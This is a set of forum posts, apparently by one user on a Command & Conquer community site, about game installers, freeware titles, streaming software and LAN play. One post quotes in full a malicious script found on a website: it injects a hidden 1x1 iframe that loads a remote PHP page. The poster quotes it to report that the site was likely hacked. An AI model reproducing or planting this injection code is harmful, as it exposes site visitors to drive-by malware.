I know of a few games like Age of Empires 2 that allow saving multiplayer games, I think StarCraft 1 also allows this. So there are some devs that are interested in saving multiplayer games.

I used a full install with my new installer, but when the others installed switched to the beta installer to stop the lag (the used the old stable released installer before) they installed multiplayer only which turned out to be bugged. The lag in the first games were not caused by connection issues but by the game itself and the new installer has measures to prevent such lag. A lot of computers have issues with building cheap units, large battles etc due to how the game is built hence why the graphics patch was made and hence why the new beta installer includes ddwrapper configured with "NoVideoMemory = 1". By the way the test game we had before you quit worked fine, but I guess you misunderstood the point of a test game. It's just to test connections.

Desyncs? There were no desyncs. Just random connection issues at the start, the only issue that was caused by the TS installer beta was the Internal Errors caused by playing Firestorm maps (since some FS files were inadvertently missing in the multiplayer only install). This issue has been resolved now. By the way ddwrapper is in no way an equivalent of cnc-ddraw they are very different. While cnc-ddraw is a reimplementation of Direct Draw ddwrapper simply sits in between the game and Direct Draw applying some compatibility fixes.

It was originally called "Black Mesa: Source", but Valve asked them to remove "Source" from the name as they felt people would think it was an official product. That's a part of the deal as well. Always connected and always something to buy; micro transactions or otherwise.
-
There's nothing called "Black Mesa: Source" it's called just Black Mesa and it can be called a game as it doesn't build upon any game, it just requires the source SDK. Free to play and freeware is different. In a freeware game you get all the content for free while in free to play you can or have to unlock content by paying for it. While in Free and Open Source software you get the game and the source code without paying. Also I updated my list, I forgot Xonotic.

My top 10. C&C: Tiberian Dawn + Covert Operations (Freeware) C&C: Red Alert + Counterstrike + Aftermath (Freeware) C&C: Tiberian Sun + Firestorm (Freeware) Black Mesa (Freeware) Twisted Insurrection (Freeware) Dawn of the Tiberium Age (Freeware) Xonotic (Free and Open Source) Warzone 2100 (Free snd Open Source) Arctic Combat (Free to play) A Path Beyond pre Gamma update (Freeware) As for the top 3 dislikes OpenRA (Free and Open Source) A Path Beyond after Gamma update (Freeware) Bulletrun (Free to play) Can't think of more. Edit: Added Xonotic, which I forgot for some reason

What I meant to say: "Plokite_Wolf is using Windows XP, this prevents him from recording game sounds and the microphone in Xsplit at the same time and limits his choice of streaming software to Xsplit." I was in a bit of a hurry.

The Xi3 Piston is not THE Steam Box, but a Steam Box. If I've understood correctly the name "Steam Box" will be used on PC's that ship with Steam on them, be it on Ubuntu, other Linux distros or Windows they will all be called Steam Boxes. As for the Xi3 Piston I've only seen pictures of it running Windows... By the way there might be a Steam Box coming from Valve themselves most likely running Ubuntu, but Gabe says that it will not be locked to any OS so you can install what ever OS you like as long as it is x86 compatible.

What version of The First Decade you use has nothing to do with the version of TS you use. The latest version of TS (2.03) is already in TFD and if you have no problems then you have nothing to fear.

Twitch always saves a VoD for people who miss the stream.

I think it's nice that they are doing these community events again. I was worried that they were going to shut the fans out entirely. I hope that if they add more factions to C&C F2P they will have different building styles, though I guess it would be hard to balance a mix of the dozer and CY systems. I also hope that C&C F2P gets a fair business model avoiding all kinds of Pay to Win, I'm fine with cosmetic stuff like skins, minor XP boosts and sidegrade units.(like getting a tank that shoots faster than the normal one, but deals less damage).

Sole Survivor has no LAN mode, that is impossible. The only possible way to play Sole Survivor online would be to recreate the server functions it needs.

Working with multiple LAN adapters - Hamachi
Tore replied to bendodge's topic in Command & Conquer Patch 1.06
The DLL CnCNet uses does work on LAN and should work on Hamachi. Peer to peer mode on CnCNet is the closest you get to direct connect which also required port forwarding. Do not use CnCNet.exe you want to play on a VPN or LAN, use c&C95.exe. 1.06 does include the LAN patch. -
The free version of that seems to have limited time for streaming, it uses Silverlight and requires IIS. This is unsupported by Twitch and most free streaming services which are RTMP based.
-
To get any decent audio from Xsplit you need a subscription.
-
FFSplit is a light alternative, but it doesn't support any forms of overlays at all and it doesn't support multiple scenes. And OBS should work on XP as far as I'm aware. You need .NET Framework 4.0 and Service Pack 3.

Twitch.tv supports all streaming software, they just advertise a few. DXTory is a tool you use in co-junction with a livestreaming program to hook into games and give better game performance while streaming. When I stream I use Open Broadcaster Software. As yes Flash for IE is a requirement to use Xsplit, you need to install it, but you don't need to use iE. Just keep in mind that streaming is demanding for your computer and it's fiddly to setup.
-
Well if you guys need help with any livestream software I'm up for helping. I know my way around Xsplit, DXTory, Open Broadcaster Software and FFsplit and how to stream both modern and old C&C games.

If you tried to patch a game from the Ultimate Collection just like The First Decade you might break the game as they already have the games patched. (C&C1 and RA1 aren't properly patched though) Also, what's stopping you from playing online?

Norton is a pile of garbage. The site does have a malicious ofuscated iframe embedded on it. <script type="text/javascript"> var url="http://www.isarapost.net/featured-content-slider/images/template.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)} </script> The site might have been hacked. I don't know the purpose of it though.

Dune Dynasty - a Dune II Windows & Linux Port
Tore replied to MrFlibble's topic in Gaming Discussion
This is not a modded Dune 2, but a separate game -
If there's a file called except.txt in your RA2 folder could you upload it? I doubt they fixed anything. If I know EA right it's just The First Decade + the newer games if it's something else I'll be surprised. Also have you tried updating your graphics drivers and DirectX?

Steam Greenlight Launches Community-Based Game Platform
Tore replied to PurpleGaga27's topic in Gaming Discussion
Heroes & Generals, McPixel and Project Zomboid (among others I guess) are not mods, but full blown games...
